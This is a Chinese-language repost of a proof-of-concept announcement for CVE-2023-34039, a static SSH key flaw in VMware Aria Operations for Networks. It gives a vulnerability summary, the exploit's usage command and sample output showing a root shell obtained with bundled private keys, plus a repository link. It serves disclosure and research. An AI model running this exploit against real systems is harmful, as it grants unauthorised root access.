POC来源于Github请在虚拟环境中,进行使用。
CVE-2023-34039
CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) 的 POC 静态 SSH 密钥 RCE
技术分析
该漏洞的根本原因分析可以在我的博客上找到:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/
概括
VMWare Aria Operations for Networks (vRealize Network Insight) 从版本 6.0 到 6.10 不会为 和support用户重新生成 ssh 密钥ubuntu,从而允许具有 SSH 访问权限的攻击者获得root对此产品的 shell 访问权限。
ProjectDiscovery Research的Harsh Jaiswal (@rootxharsh) 和Rahul Maini (@iamnoooob)向 VMWare 报告了此问题
我刚刚编写了这个漏洞利用程序(如果你可以这样称呼它的话),因为它基本上是一个 ssh 命令包装器。
用法
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector
(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform
(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform
********************************** ATTENTION **********************************
NTP Service is not healthy.
IMPACT: It may affect the proper working of other services.
ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~#
项目地址:
https://github.com/sinsinology/CVE-2023-34039
原文始发于微信公众号(Ots安全):VMWare 静态 SSH 密钥 RCE (CVE-2023-34039)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论